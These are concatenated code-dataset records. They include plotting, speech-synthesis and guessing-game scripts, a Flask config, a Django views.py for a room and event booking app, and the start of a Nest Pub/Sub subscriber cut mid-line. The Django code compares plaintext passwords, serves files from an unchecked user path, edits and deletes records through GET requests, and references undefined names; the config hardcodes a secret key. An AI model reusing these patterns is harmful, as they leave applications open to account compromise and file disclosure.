PCA:\", var_data_projected_sum)\n\n ### plotting the variance and the entropy by features, variance-sorted\n features_vec = np.arange(0, 10, 1)\n fig, ax1 = plt.subplots()\n\n ax1.set_xlabel('feature')\n ax1.set_ylabel('variance')\n ax1.plot(features_vec, var_data_sorted, color=\"red\", marker='o', label=\"variance-before\")\n ax1.plot(features_vec, var_data_projected, color=\"red\", marker='D', label=\"variance-after\")\n ax1.tick_params(axis='y', labelcolor=\"red\")\n ax1.legend(loc=0)\n\n ax2 = ax1.twinx() # shared x axis.\n ax2.set_ylabel('entropy[bits]')\n ax2.plot(features_vec, entropy_data_features_sorted, color=\"blue\", marker='o', label=\"entropy-before\")\n ax2.plot(features_vec, entropy_data_projected_features, color=\"blue\", marker='D', label=\"entropy-after\")\n ax2.tick_params(axis='y', labelcolor=\"blue\")\n ax2.legend(loc=3)\n\n plt.title(\n \"Variance and Entropy for variance-sorted features\\n before and after PCA, for (v1,v2,v3,v3)=(\" + str(v1)+ \",\" + str(\n v2) + \",\" + str(v3) + \",\" + str(v4) + \")\")\n plt.show()\n\n ### plotting entropy as a function of variance\n plt.scatter(var_data_sorted, entropy_data_features_sorted, marker=\"o\", label=\"before\")\n plt.scatter(var_data_projected, entropy_data_projected_features, marker=\"o\", label=\"after\")\n plt.title(\"Entropy as a function of variance before and after PCA,\\nfor (v1,v2,v3,v3)=(\" + str(v1)+ \",\" + str(\n v2) + \",\" + str(v3) + \",\" + str(v4) + \")\")\n plt.xlabel(\"variance\")\n plt.ylabel(\"entropy[bits]\")\n plt.legend()\n plt.show()\n\n ### plotting the accomulating variance and entropy over features, variance-sorted\n entropy_before_sum = []\n entropy_after_sum = []\n variance_before_sum = []\n variance_after_sum = []\n for i in np.arange(1, features + 1, 1):\n entropy_before_sum += [np.sum(entropy_data_features_sorted[0:i])]\n entropy_after_sum += [np.sum(entropy_data_projected_features[0:i])]\n variance_before_sum += [np.sum(var_data_sorted[0:i])]\n variance_after_sum += [np.sum(var_data_projected[0:i])]\n\n features_vec = np.arange(0, 10, 1)\n fig, ax1 = plt.subplots()\n\n ax1.set_xlabel('feature')\n ax1.set_ylabel('variance')\n ax1.plot(features_vec, variance_before_sum, color=\"red\", marker='o', label=\"variance-before\")\n ax1.plot(features_vec, variance_after_sum, color=\"red\", marker='D', label=\"variance-after\")\n ax1.tick_params(axis='y', labelcolor=\"red\")\n ax1.legend(loc=2)\n\n ax2 = ax1.twinx() # shared x axis.\n ax2.set_ylabel('entropy')\n ax2.plot(features_vec, entropy_before_sum, color=\"blue\", marker='o', label=\"entropy-before\")\n ax2.plot(features_vec, entropy_after_sum, color=\"blue\", marker='D', label=\"entropy-after\")\n ax2.tick_params(axis='y', labelcolor=\"blue\")\n ax2.legend(loc=4)\n\n plt.title(\n \"Accomulating variance-sum and entropy-sum for variance-sorted\\nfeatures before and after PCA, for (v1,v2,v3,v3)=(\" + str(v1)+ \",\" + str(\n v2) + \",\" + str(v3) + \",\" + str(v4) + \")\")\n plt.show()\n","sub_path":"PCA_entropy.py","file_name":"PCA_entropy.py","file_ext":"py","file_size_in_byte":6384,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"118137576","text":"import argparse\nfrom typing import Optional\n\nimport core\nimport soundfile\n\nfrom forwarder import Forwarder\n\n\ndef run(\n use_gpu: bool,\n text: str,\n speaker_id: int,\n f0_speaker_id: Optional[int],\n f0_correct: float,\n) -> None:\n # コアの初期化\n core.initialize(\"./\", use_gpu)\n\n # 音声合成処理モジュールの初期化\n forwarder = Forwarder(\n yukarin_s_forwarder=core.yukarin_s_forward,\n yukarin_sa_forwarder=core.yukarin_sa_forward,\n decode_forwarder=core.decode_forward,\n )\n\n # 音声合成\n wave = forwarder.forward(\n text=text,\n speaker_id=speaker_id,\n f0_speaker_id=f0_speaker_id if f0_speaker_id is not None else speaker_id,\n f0_correct=f0_correct,\n )\n\n # 保存\n soundfile.write(f\"{text}-{speaker_id}.wav\", data=wave, samplerate=24000)\n\n core.finalize()\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--use_gpu\", action=\"store_true\")\n parser.add_argument(\"--text\", required=True)\n parser.add_argument(\"--speaker_id\", type=int, required=True)\n parser.add_argument(\"--f0_speaker_id\", type=int)\n parser.add_argument(\"--f0_correct\", type=float, default=0)\n run(**vars(parser.parse_args()))\n","sub_path":"example/python/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":1263,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"435298769","text":"# -*- coding: utf-8 -*-\n\n__author__ = 'sobolevn'\n\nDEBUG = True\nSECRET_KEY = 'asdfsdfssf asf dsgsdg'\nUPLOAD_FOLDER = 'upload/avatar'\n#WTF_CSRF_ENABLED = False\n\n#file uploader setting\n#UPLOADED_PHOTOS_DEST = 'upload/avatar'\n#UPLOADED_FILES_ALLOW = ('png', 'jpg', 'gif')\n#MAX_CONTENT_LENGTH = 16 * 1024 * 1024\n\n","sub_path":"project9/app/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":308,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"129410667","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Nov 24 23:04:52 2017\n\n@author: Adwait\n\"\"\"\n\nprint('Please think of a number between 0 and 100!')\nm=50\nl1=0\nl2=100\ng='a'\nwhile g!='c':\n print('Is your secret number ', int(m),'?')\n g=input(\"Enter 'h' to indicate the guess is too high. Enter 'l' to indicate the guess is too low. Enter 'c' to indicate I guessed correctly.\")\n if g=='h':\n l2=m\n elif g=='l':\n l1=m\n elif g!='c':\n print('You should enter h, l or c. Please reenter.')\n m=int(l1/2+l2/2)\n if l1==l2:\n print(\"Your No is %d\"%m)\n break\nprint('Game over. Your secret number was: ', int(m))\n\n\n","sub_path":"bisection no guess game.py","file_name":"bisection no guess game.py","file_ext":"py","file_size_in_byte":645,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"559211974","text":"from django.shortcuts import render\nfrom django.conf import settings\nfrom django.core.files.storage import FileSystemStorage\nfrom django.template.loader import render_to_string\nfrom django.views.generic import ListView\nfrom django.contrib.auth.forms import UserCreationForm\nfrom rooms import models as rooms_models\nfrom django.shortcuts import render,redirect\nfrom rooms import forms as rooms_forms\nfrom django.contrib import messages\nfrom django.http import HttpResponse,JsonResponse\nfrom django.shortcuts import get_object_or_404\nfrom django.contrib.auth.decorators import login_required\nfrom rooms.models import CrudUser\nfrom rooms.models import Room, Emptyroom,Events\nfrom django.utils import timezone\nfrom rooms.forms import EventForm \nfrom django.db.models import Q\nfrom wsgiref.util import FileWrapper\nfrom django.contrib.auth import login, authenticate\nfrom django.shortcuts import render, redirect, get_object_or_404, HttpResponseRedirect,Http404\t\nfrom django.contrib.sites.shortcuts import get_current_site\nfrom django.utils.encoding import force_text\nfrom django.contrib.auth.models import User\nfrom django.db import IntegrityError\nfrom django.utils.http import urlsafe_base64_decode\nfrom django.utils.encoding import force_bytes\nfrom django.utils.http import urlsafe_base64_encode\nfrom .tokens import account_activation_token\nfrom django.template.loader import render_to_string\nfrom .forms import SignUpForm,CreateUserForm,UserUpdateForm,ProfileUpdateForm\nfrom django.contrib.auth.decorators import login_required\n\nfrom django.contrib import messages\n\n@login_required\ndef profile(request):\n if request.method == 'POST':\n u_form = UserUpdateForm(request.POST, instance=request.user)\n p_form = ProfileUpdateForm(request.POST,\n request.FILES,\n instance=request.user.profile)\n if u_form.is_valid() and p_form.is_valid():\n u_form.save()\n p_form.save()\n # messages.success(request, f'Profile has been updated successfully')\n return redirect('profile')\n\n else:\n u_form = UserUpdateForm(instance=request.user)\n p_form = ProfileUpdateForm(instance=request.user.profile)\n\n context = {\n 'u_form': u_form,\n 'p_form': p_form\n }\n\n return render(request, 'registration/profile.html', context)\n\n\n\n\ndef registerPage(request):\n\tform = CreateUserForm()\n\n\tif request.method == 'POST':\n\t\tform = CreateUserForm(request.POST)\n\t\tif form.is_valid():\n\t\t\tform.save()\n\t\t\treturn redirect('login')\n\n\tcontext = {'form':form}\n\treturn render(request,'user/register.html',context)\n\n\ndef download(request, path):\n\tfile_path = os.path.join(settings.MEDIA_ROOT, path)\n\tif os.path.exists(file_path):\n\t\twith open(file_path, 'rb') as fh:\n\t\t\tresponse = HttpResponse(fh.read(),content_type=\"application/vnd.ms-excel\")\n\t\t\tresponse['Content-Disposition'] = 'inline; filename=' + os.path.basename(file_path)\n\t\t\treturn response\n\t\traise Http404\t\n\ndef files_view(request):\n\tfiles = rooms_models.Document.objects.filter(id=request.id)\n\treturn render(request, template_name='user/download.html')\n\ndef loginPage(request):\n\tcontext = {}\n\treturn render(request,'user/login.html',context)\n\n\n\n\n\ndef activation_sent_view(request):\n return render(request, 'registration/activation_sent.html')\n\n\ndef activate(request,uidb64,token):\n\ttry:\n\t\tuid = force_text(urlsafe_base64_decode(uidb64))\n\t\tuser = User.objects.get(pk=uid)\n\texcept (TypeError,ValueError,OverflowError,user.DoesNotExist):\n\t\tuser = None\n\tif user is not None and account_activation_token.check_token(user,token):\n\t\tuser.is_active = True\n\t\tuser.profile.signup_confirmation = True\n\t\tuser.save()\n\n\t\treturn redirect('home')\t\n\telse:\n\t\treturn render(request,'activation_invalid.html')\n\n\n\n# def activate(request, uidb64, token):\n# try:\n# uid = force_text(urlsafe_base64_decode(uidb64))\n# user = User.objects.get(pk=uid)\n# except (TypeError, ValueError, OverflowError, User.DoesNotExist):\n# user = None\n# # checking if the user exists, if the token is valid.\n# if user is not None and account_activation_token.check_token(user, token):\n# # if valid set active true \n# user.is_active = True\n# # set signup_confirmation true\n# user.profile.signup_confirmation = True\n# user.save()\n# login(request,user)\n# return redirect('home')\n# else:\n# return render(request, 'activation_invalid.html')\n\ndef signup(request):\n if request.method == 'POST':\n form = SignUpForm(request.POST)\n if form.is_valid():\n user = form.save()\n user.refresh_from_db()\n # user.profile.first_name = form.cleaned_data.get('first_name')\n # user.profile.last_name = form.cleaned_data.get('last_name')\n user.profile.email = form.cleaned_data.get('email')\n # user can't login until link confirmed\n user.is_active = True\n user.save()\n login = {\n 'user':user\n }\n current_site = get_current_site(request)\n subject = 'Please Activate Your Account'\n # load a template like get_template() \n # and calls its render() method immediately.\n message = render_to_string('registration/account_activation_email.html', {\n 'user': user,\n 'domain': current_site.domain,\n 'uid': urlsafe_base64_encode(force_bytes(user.pk)),\n # method will generate a hash value with user related data\n 'token': account_activation_token.make_token(user),\n })\n user.email_user(subject, message)\n return redirect('activation_sent')\n else:\n form = SignUpForm()\n return render(request, 'registration/signup.html', {'form': form})\n\n\ndef loginPage(request):\n\tif request.method == 'POST':\n\t\tusername = request.POST.get('username')\n\t\tpassword = request.POST.get('password')\n\n\t\tuser = authenticate(request,username=username,password=password)\n\n\t\tif user is not None:\n\t\t\tlogin(request,user)\n\t\t\treturn redirect('home')\n\t\telse:\t\n\t\t\tmessages.info(request,'Username OR Password is incorrect')\n\tcontext = {}\n\treturn render(request,'registration/login.html',context)\t\t\n\n\n\n# def signup(request):\n# if request.method == 'POST':\n# form = rooms_forms.SignUpForm(request.POST)\n# if form.is_valid():\n# form.save()\n# username = form.cleaned_data.get('username')\n# raw_password = form.cleaned_data.get('password1')\n# user = authenticate(username=username, password=raw_password)\n# login(request, user)\n# return redirect('home')\n# else:\n# form = rooms_forms.SignUpForm()\n# return render(request, 'temps/signup.html', {'form': form})\n\n\n# Create your views here.\n\n\n# def home(request):\n# \treturn render(request,'temps/home.html')\n\n# def rooms(request):\n# \tform_class = rooms_forms.RoomForm\n# \tif request.method == 'POST':\n# \t\tform = form_class(data=request.POST)\n# \t\tif form.is_valid():\n# \t\t\tNewrooms = Room()\n# \t\t\tNewrooms.rooms = request.POST.get('rooms')\n# \t\t\tNewrooms.location = request.POST.get('location')\n# \t\t\tNewrooms.status = request.POST.get('status')\n# \t\t\tNewrooms.created = timezone.now()\n# \t\t\tNewrooms.save()\n# \t\t\treturn redirect('home')\n# \t\telse:\n# \t\t\tform = form_class\n# \treturn render(request, 'temps/rooms.html',{'rooms':form_class})\n# def rooms(request):\n# \tif request.method == 'POST' and request.FILES['myfile']:\n# \t\tmyfile = request.FILES['myfile']\n# \t\tfs = FileSystemStorage()\n# \t\tfilename = fs.save(myfile.name, myfile)\n# \t\tuploaded_file_url = fs.url(filename)\n# \t\treturn render(request, 'temps/rooms.html',{\n# \t\t\t'uploaded_file_url':uploaded_file_url\n# \t\t\t})\n# \treturn render(request,'temps/rooms.html')\t\n\n\n# def signup_view(request):\n# \tform = UserCreationForm(request.POST)\n# \tif form.is_valid():\n# \t\tform.save()\n# \t\tusername = form.cleaned_data.get('username')\n# \t\tpassword = form.cleaned_data.get('password1')\n# \t\tuser = authenticate(username=username,password=password)\n# \t\tlogin(request,user)\n# \t\treturn redirect('home')\n# \treturn render(request,'signup.html',{'form':form})\t\n\n@login_required\ndef rooms(request): \t\n\tdoc = rooms_models.Document.objects.all()\n\tif request.method == 'POST':\n\t\tform = rooms_forms.DocumentForm(request.POST, request.FILES)\n\t\tif form.is_valid():\n\t\t\tform.save()\n\t\t\treturn redirect('home')\n\telse:\n\t\tform = rooms_forms.DocumentForm()\n\treturn render(request,'temps/rooms.html',{\n\t\t'form':form\n\t\t})\n\t\n\n# def events(request):\n# \tform = rooms_forms.EventsForm\n# \tevents = Events.objects.all()\n\n# \tif request.POST.get('action') == 'post':\n# \t\ttitle = request.POST.get('title')\n# \t\tdescription = request.POST.get('description')\n\n\n# \t\tobj = Events.objects.create(\n# \t\t\ttitle = title,\n# \t\t\tdescription = description,\n# \t\t\t)\n# \t\tuser = {'id':obj.id,'title':obj.title,'description':obj.description}\n# \t\tresponse_data = {\n# \t\t 'user':user\n# \t\t}\n# \t\treturn JsonResponse(response_data)\n# \treturn render(request, 'temps/events.html',{'events':events})\t\n@login_required\ndef events(request):\n\tform_class = rooms_forms.EventForm\n\tevents = Events.objects.all()\n\n\tif request.POST.get('action') == 'post':\n\t\ttitle = request.POST.get('title')\n\t\tdescription = request.POST.get('description')\n\n\t\tobj = Events.objects.create(\n\t\t\ttitle = title,\n\t\t\tdescription=description,\n\n\t\t\t)\n\t\tuser = {'id':obj.id,'title':obj.title,'description':obj.description}\n\n\t\tresponse_data = {\n\t\t 'user':user\n\t\t}\n\t\treturn JsonResponse(response_data)\n\treturn render(request, 'temps/events.html',{'events':events})\t\n\n@login_required\ndef events_update(request):\n\tid = request.GET.get('id',None)\n\ttitle = request.GET.get('title',None)\n\tdescription = request.GET.get('description',None)\n\n\tobj = Events.objects.get(id=id)\n\tobj.title = title\n\tobj.description = description\n\tobj.save()\n\n\tuser = {'id':obj.id,'title':obj.title,'description':obj.description}\n\n\tresponse_data = {\n\t 'user':user\n\t}\n\treturn JsonResponse(response_data)\n\n@login_required\ndef events_delete(request):\n\tid = request.GET.get('id',None)\n\tEvents.objects.get(id=id).delete()\n\tresponse_data = {\n\t 'deleted':True\n\t}\n\treturn JsonResponse(response_data)\n\n\n# def events_delete(request):\n# \tid = request.GET.get('id',None)\n# \tEvent.objects.get(id=id).delete()\n# \tresponse_data = {\n# \t 'deleted':True\n# \t}\n# \treturn JsonResponse(response_data)\n\n\n\t\t\n\n\n\n\n\t \t \n\n\n# def delete(request,id):\n# \tobj = Event.objects.get(id=id)\n# \tobj.delete()\n# \treturn JsonResponse(response_data)\n\n# def event(request):\n# \tform_class = rooms_forms.EventForm\n# \tevent = Event.objects.all()\n# \tresponse_data = {}\n\n# \tif request.POST.get('action') == 'post':\n# \t\ttitle = request.POST.get('title')\n# \t\tdescription = request.POST.get('description')\n# \t\tvenue = request.POST.get('venue')\n# \t\tmdate = request.POST.get('mdate')\n# \t\tmtime = request.POST.get('mtime')\n\n# \t\tresponse_data['title'] = title\n# \t\tresponse_data['description'] = description\n# \t\tresponse_data['venue'] = venue\n# \t\tresponse_data['mdate'] = mdate\n# \t\tresponse_data['mtime'] = mtime\n\n\n# \t\tEvent.objects.create(\n# \t\t\ttitle = title,\n# \t\t\tdescription = description,\n# \t\t\tvenue = venue,\n# \t\t\tmdate = mdate,\n# \t\t\tmtime = mtime,\n# \t\t\t)\n# \t\treturn JsonResponse(response_data)\n \n# \treturn render(request, 'temps/event.html',{'event':event})\t\n\n@login_required\ndef student(request):\n\tform_class = rooms_forms.StudentForm\n\tstudent = rooms_models.Student.objects.all()\n\n\tif request.POST.get('action') == 'post':\n\t\tcourse = request.POST.get('course')\n\t\tunit = request.POST.get('unit')\n\t\tyear_of_study = request.POST.get('year_of_study')\n\t\trooms = request.POST.get('rooms')\n\t\tmtime = request.POST.get('mtime')\n\n\t\tobj = rooms_models.Student.objects.create(\n\t\t\tcourse = course,\n\t\t\tunit = unit,\n\t\t\tyear_of_study = year_of_study,\n\t\t\trooms = rooms,\n\t\t\tmtime = mtime,\n\t\t\t)\n\t\tuser = {'course':obj.course,'unit':obj.unit,'year_of_study':obj.year_of_study,'rooms':obj.rooms,'mtime':obj.mtime}\n\t\tresponse_data = {\n\t\t 'user':user\n\t\t}\n\t\treturn JsonResponse(response_data)\n\treturn render(request,'temps/students.html',{'student':student})\t\n\n# def student(request):\t\n# \tid = request.GET.get('id',None)\n# \trooms = request.GET.get('rooms',None)\n\n# \tobj = rooms_models.Student.objects.get(id=id)\n# \tobj.rooms = rooms\n# \tobj.save()\n\n# \tuser = {'id':obj.id,'rooms':obj.rooms}\n# \tresponse_data = { \n# \t'user':user\n# \t}\n# \treturn JsonResponse(response_data)\n\n\ndef login(request):\n\tm = Member.objects.get(username=request.POST['username'])\n\tif m.password == request.POST['password']:\n\t\trequest.session['member_id'] = m.id\n\t\treturn HttpResponse(\"you're logged in.\")\n\telse:\n\t\treturn HttpResponse(\"Your username and password didn't match.\")\n\ndef logout(request):\n\ttry:\n\t\tdel request.session['member_id']\n\texcept KeyError:\n\t\tpass\n\treturn HttpResponse(\"you're logged out.\")\t\n@login_required\n#creating\ndef search(request):\n\tif request.method=='POST':\n\t\tsrch = request.POST['srh']\n\n\t\tif srch:\n\t\t\tmatch = rooms_models.Student.objects.filter(Q(course__icontains=srch)|\n\t\t\t\t Q(unit__icontains=srch)\n\t\t\t\t )\n\t\t\tif match:\n\t\t\t\treturn render(request,'temps/search.html',{'sr':match})\n\t\t\telse:\n\t\t\t messages.error(request,'no result found')\n\t\telse:\n\t\t\treturn HttpResponseRedirect('/search/')\n\treturn render(request,'temps/search.html')\n\n@login_required\t\t \ndef event(request):\n\t# form_class = rooms_forms.EventForm\n\tevent = rooms_models.Event.objects.all()\n\n\tif request.POST.get('action') == 'post':\n\t\ttitle1 = request.POST.get('title')\n\t\tdescription1 = request.POST.get('description')\n\t\tvenue1 = request.POST.get('venue')\n\t\tmdate1 = request.POST.get('mdate')\n\t\tmtime1 = request.POST.get('mtime')\n\n\n\t\tobj = rooms_models.Event.objects.create(\n\t\t\ttitle = title1,\n\t\t\tdescription =description1,\n\t\t\tvenue = venue1,\n\t\t\tmdate = mdate1,\n\t\t\tmtime = mtime1,\n\t\t\t)\n\t\tuser = {'id':obj.id,'title':obj.title,'description':obj.description,'venue':obj.venue,'mdate':obj.mdate,'mtime':obj.mtime}\n\n\t\tresponse_data = {\n\t\t 'user':user\n\t\t}\n\t\treturn JsonResponse(response_data)\n\treturn render(request, 'temps/event.html',{'event':event})\t\n#updating\n@login_required\ndef event_update(request):\n\tid1 = request.GET.get('id',None)\n\ttitle1 = request.GET.get('title',None)\n\tdescription1 = request.GET.get('description',None)\n\tvenue1 = request.GET.get('venue',None)\n\tmdate1 = request.GET.get('mdate',None)\n\tmtime1 = request.GET.get('mtime',None)\n\n\tobj = rooms_models.Event.objects.get(id= id1)\n\tobj.title = title1\n\tobj.description = description1\n\tobj.venue = venue1\n\tobj.mdate = mdate1\n\tobj.mtime = mtime1\n\tobj.save()\n\n\tuser = {'id':obj.id,'title':obj.title,'description':obj.description,'venue':obj.venue,'mdate':obj.mdate,'mtime':obj.mtime}\n\tresponse_data = {\n 'user':user\n\t}\n\treturn JsonResponse(response_data)\n\n@login_required\ndef emptyrooms(request):\n\tform_class = rooms_forms.EmptyroomForm\n\temptyrooms = Emptyroom.objects.all()\n\n\tif request.POST.get('action') == 'post':\n\t\trooms = request.GET.get('rooms')\n\t\tlocation = request.POST.get('location')\n\n\t\tobj = Emptyroom.objects.create(\n\t\t\trooms = rooms,\n\t\t\tlocation = location,\n\t\t\t)\n\t\tuser = {'id':obj.id,'rooms':obj.rooms,'location':obj.location}\n\n\t\tresponse_data = {\n\t\t 'user':user\n\t\t}\n\t\treturn JsonResponse(response_data)\n\treturn render(request, 'temps/emptyrooms.html',{'emptyrooms':emptyrooms})\t\t\n\n@login_required\ndef emptyrooms_up(request):\t\n\tid1 = request.GET.get('id',None)\n\trooms = request.GET.get('rooms',None)\n\n\tobj = Emptyroom.objects.get(id=id)\n\tobj.rooms = rooms\n\tobj.save()\n\n\tuser = {'id':obj.id,'rooms':obj.rooms}\n\tresponse_data = {\n\t 'user':user\n\t}\n\treturn JsonResponse(response_data)\n\t \n\n\t \n\t\n#deleting\n\n@login_required\ndef event_delete(request):\n\tid = request.GET.get('id',None)\n\trooms_models.Event.objects.get(id=id).delete()\n\tresponse_data = {\n\t 'deleted':True\n\t}\n\treturn JsonResponse(response_data)\n\n\n# def students(request):\n# \tform_class = rooms_forms.StudentForm\n# \tstudent = rooms_models.Student.objects.all()\n# \tif request.POST.get('action') == 'post':\n# \t\tcourse = request.POST.get('course')\n# \t\tyear_of_study = request.POST.get('year_of_study')\n# \t unit = request.POST.get('unit')\n# rooms = request.POST.get('rooms')\n\n# \t obj = rooms_models.Student.objects.create(\n# \t \tcourse = course,\n# \t \tyear_of_study = year_of_study,\n# \t \tunit = unit,\n# \t \trooms = rooms,\n# \t)\n# user = {'course':obj.course,'year_of_study':obj.year_of_study,'unit':obj.unit,'rooms':obj.rooms}\n\n# data = {\n# 'user':user\n# }\n# return JsonResponse(data)\n# # return render(request,'temps/',{'student':student}) \n\n\n\n\n\n\n\n\n\n\n# def events(request):\n# \tform_class = rooms_forms.EventsForm\n# \tif request.method == 'POST':\n# \t\ttitle = request.POST.get('title')\n# \t\tdescription = request.POST.get('description')\n# \t\tdate = request.POST.get('date')\n# \t\ttime = request.POST.get('time')\n# \t\tvenue = request.POST.get('venue')\n# \t\tcreated = timezone.now()\n# \t\tfeedback = rooms_models.Events.objects.create(\n# \t\t\t\tvenue=venue,\n# \t\t\t title=title,\n# \t\t\t\tdescription=description,\n# \t\t\t\tdate=date,\n# \t\t\t\ttime=time,\n# \t\t\t\t)\n# \t\tfeedback.save()\n# \t\tdata = {\n# \t\t\t\tvenue:venue,\n# \t\t\t\ttitle:title,\n# \t\t\t\tdescription:description,\n# \t\t\t\tdate:date,\n# \t\t\t\ttime:time,\n# \t\t\t\tcreated:created\n# \t\t\t}\n\t \n\n# \t\treturn JsonResponse({'data':'data'})\n# \treturn JsonResponse({'data':'Error'})\n\n# \t\t# \tNewEvents.save()\n# \t\t# \treturn redirect('home')\n# \t\t# else:\n# \t\t# form =form_class\t\n\n# \treturn render(request, 'temps/events.html',{'rooms':form_class})\t\t\n\n\n\n# def emptyrooms(request):\n# \tform_class = rooms_forms.EmptyroomForm\n# \tif request.method == 'POST':\n# \t\tform = form_class(data=request.POST)\n# \t\tif form.is_valid():\n# \t\t\tNewrooms = Room()\n# \t\t\tNewrooms.rooms = request.POST.get('rooms')\n# \t\t\tNewrooms.location = request.POST.get('location')\n# \t\t\tNewrooms.status = request.POST.get('status')\n# \t\t\tNewrooms.created = timezone.now()\n# \t\t\tNewrooms.save()\n# \t\t\treturn redirect('home')\n# \t\telse:\n# \t\t\tform = form_class\n# \treturn render(request,'temps/emptyrooms.html',{'rooms':form_class})\n\n# def students(request):\n# \tform_class = rooms_forms.StudentForm\n# \tif request.method == 'POST':\n# \t\tform = form_class(data=request.POST)\n# \t\tif form.is_valid():\n# \t\t\tNewrooms = rooms_models.Student()\n# \t\t\tNewrooms.course= request.POST.get('course')\n# \t\t\tNewrooms.rooms = request.POST.get('rooms')\n# \t\t\tNewrooms.year_of_study = request.POST.get('year_of_study')\n# \t\t\tNewrooms.unit = request.POST.get('unit')\n# \t\t\tNewrooms.created = timezone.now()\n# \t\t\tNewrooms.save()\n# \t\t\treturn redirect('home')\n# \t\telse:\n# \t\t\tform = form_class\n# \treturn render(request, 'temps/students.html',{'rooms':form_class})\n\n@login_required\ndef lecturers(request):\n\tform_class = rooms_forms.LecturerForm\n\tif request.method == 'POST':\n\t\tform = form_class(data=request.POST)\n\t\tif form.is_valid():\n\t\t\tNewrooms =rooms_models.Lecturer()\n\t\t\tNewrooms.rooms = request.POST.get('rooms')\n\t\t\tNewrooms.course= request.POST.get('course')\n\t\t\tNewrooms.unit= request.POST.get('unit')\n\t\t\tNewrooms.status = request.POST.get('status')\n\t\t\tNewrooms.created = timezone.now()\n\t\t\tNewrooms.save()\n\t\t\treturn redirect('home')\n\t\telse:\n\t\t\tform = form_class\n\treturn render(request, 'temps/lecturers.html',{'rooms':form_class})\t\t\n\n\n\n# def emptyrooms(request):\n# \tform_class = rooms_forms.EmptyroomForm\n# \temptyrooms = Emptyroom.objects.all()\n# \tresponse_data = {}\n\n# \tif request.POST.get('action') == 'post':\n# \t\trooms = request.GET.get('rooms')\n# \t\tlocation = request.POST.get('location')\n\n# \t\tresponse_data['rooms'] = rooms\n# \t\tresponse_data['location'] = location\n\n\n# \t\tEmptyroom.objects.create(\n# \t\t\trooms = rooms,\n# \t\t\tlocation = location,\n# \t\t\t)\n# \t\treturn JsonResponse(response_data)\n# \treturn render(request, 'temps/emptyrooms.html',{'emptyrooms':emptyrooms})\t\n\n\n\n# class CrudView(ListView):\n# model = CrudUser\n# template_name = 'temps/home.html'\n# context_object_name = 'users'\n\n# def crudview(request):\n# \tmodel = CrudUser\n# \ttemplate_name = 'temps/home.html'\n# \tcontext_object_name = 'users'\n\ndef home(request):\n\tmodel = CrudUser\n\tcruduser = CrudUser.objects.all()\n\tcontext_object_name = 'users'\n\tif request.POST.get('action') == 'post':\n\t\tname1 = request.POST.get('name',None)\n\t\taddress1 = request.POST.get('address', None)\n\t\tage1 = request.POST.get('age', None)\n\n\t\tobj = CrudUser.objects.create(\n\t\t\tname = name1,\n\t\t\taddress = address1,\n\t\t\tage = age1,\n\t\t\t)\n\t\tuser = {'id':obj.id,'name':obj.name,'address':obj.address,'age':obj.age}\n\n\t\tdata = {\n\t\t'user': user\n\t\t}\n\t\treturn JsonResponse(data)\n\treturn render(request, 'temps/home.html', {'cruduser':cruduser})\t\n\n\ndef Update(request):\n\tmodel = CrudUser\n\tcruduser = CrudUser.objects.all()\n\tcontext_object_name = 'users'\n\tif request.GET.get('action') == 'post':\n\t\tid1 = request.GET.get('id',None)\n\t\tname1 = request.GET.get('name',None)\n\t\taddress1 = request.GET.get('address',None)\n\t\tage1 = request.GET.get('age',None)\n\n\t\tobj = CrudUser.objects.get(id=id1)\n\t\tobj.name = name1\n\t\tobj.address = address1\n\t\tobj.age = age1\n\t\tobj.save()\n\n\t\tuser = {'id':obj.id,'name':obj.name,'address':obj.address,'age':obj.age}\n\n\t\tdata = {\n\t\t 'user': user\n\t\t}\n\n\t\treturn JsonResponse(data)\n\n\n\n# class CreateCrudUser(ListView):\n# def get(self, request):\n# name1 = request.GET.get('name', None)\n# address1 = request.GET.get('address', None)\n# age1 = request.GET.get('age', None)\n\n# obj = CrudUser.objects.create(\n# name = name1,\n# address = address1,\n# age = age1\n# )\n\n# user = {'id':obj.id,'name':obj.name,'address':obj.address,'age':obj.age}\n\n# data = {\n# 'user': user\n# }\n# return JsonResponse(data)\t\n\n# class UpdateCrudUser(ListView):\n# def get(self, request):\n# id1 = request.GET.get('id', None)\n# name1 = request.GET.get('name', None)\n# address1 = request.GET.get('address', None)\n# age1 = request.GET.get('age', None)\n\n# obj = CrudUser.objects.get(id=id1)\n# obj.name = name1\n# obj.address = address1\n# obj.age = age1\n# obj.save()\n\n# user = {'id':obj.id,'name':obj.name,'address':obj.address,'age':obj.age}\n\n# data = {\n# 'user': user\n# }\n# return JsonResponse(data) \n\n\n \n# class DeleteCrudUser(ListView):\n# def get(self, request):\n# id1 = request.GET.get('id', None)\n# CrudUser.objects.get(id=id1).delete()\n# data = {\n# 'deleted': True\n# }\n# return JsonResponse(data)","sub_path":"rooms/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":22638,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"55"} +{"seq_id":"67909699","text":"\"\"\"Subscriber for the Smart Device Management event based API.\"\"\"\nimport asyncio\nimport json\nimport logging\nfrom abc import ABC, abstractmethod\n\nfrom google.cloud import pubsub_v1\n\nfrom .auth import AbstractAuth\nfrom .device_manager import DeviceManager\nfrom .event import EventCallback, EventMessage\nfrom .google_nest_api import GoogleNestAPI\n\n_LOGGER = logging.getLogger(__name__)\n\n\nclass AbstractSusbcriberFactory(ABC):\n \"\"\"Abstract class for creating a subscriber, to facilitate testing.\"\"\"\n\n @abstractmethod\n async def new_subscriber(\n self, creds, subscription_name, callback\n ) -> pubsub_v1.subscriber.futures.StreamingPullFuture:\n \"\"\"Create a new event subscriber.\"\"\"\n\n\nclass DefaultSubscriberFactory(AbstractSusbcriberFactory):\n \"\"\"Default implementation that creates Google Pubsub subscriber.\"\"\"\n\n async def new_subscriber(\n self, creds, subscription_name, callback\n ) -> pubsub_v1.subscriber.futures.StreamingPullFuture:\n subscriber = pubsub_v1.SubscriberClient(credentials=creds)\n return subscriber.subscribe(subscription_name, 